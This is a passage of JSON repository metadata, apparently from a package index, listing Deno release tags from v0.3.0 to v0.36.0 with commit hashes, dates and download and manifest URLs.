a2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at"